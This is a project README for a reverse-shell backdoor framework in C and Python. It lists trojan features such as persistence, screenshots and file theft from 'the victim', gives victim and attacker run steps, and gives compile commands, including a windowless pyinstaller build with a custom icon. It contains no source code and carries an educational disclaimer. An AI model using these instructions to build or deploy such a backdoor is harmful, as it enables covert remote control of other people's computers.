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RSB Framework

Reverse Shell Backdoor is a framework to control infected machines with some cool interactions. It's capable of send files, run programs in the background, screenshot and shit.

There are two versions of the code, the C and Python. If you want to learn about sockets and reverse connection, you should check it out.

Travis branch Travis branch Travis branch Travis branch


This Framework musn't be used to harm/threat/hurt other person's computer.

It's purpose is only to share knowledge and awareness about Computer virus/Operating Sistems/Programming, made for learning and awareness about secutiry.

The program isn't complete nor all the funcionalities are working.

What's a backdoor ?

Backdoor is a computer virus popular known as trojan horse. It work's as a reverse shell to victim computer. So the attacker maintains access to victim computer after the bridge with some system vulnerability exploitation.

How to use ?

First the victim should run the backdoor compiled in the computer. Then when the attacker run the servidor.py he shall get a reverse connection to the victim comuter.


python backdoor.py


python servidor.py


  • It can be used to control the victim computer with a reverse shell.
  • Also you can be used to controll your own computer without being home!
  • Send and download files, run programs.

Backdoor features :

  • Remote connection.
  • Download files from the victim machine.
  • Send files to victim machine.
  • Persistence.
  • Screenshot of the victim screen.
  • Execute other programs in the victim computer.
  • Backdoor complete (Only when all features ready).


If you want to run Python version you need to install all the dependecies


~$ sudo pip install -r requeriments.txt


pip install -r requeriments.txt

If you want to run C code version you dont need to install any dependecies.


The Python code needs to be compiled or be executed as a script (not recommended).


pyinstaller -F --clean -w backdoor.py -n backdoor


pyinstaller -F --clean -w backdoor.py -i icon.png

The C code needs to be compiled.

~$ chmod +x comp.sh
~$ sh comp.sh


~$ gcc backdoor.c lib/communication.c  lib/commands.c -o bin/client
~$ gcc server.c lib/communication.c lib/commands.c -o bin/server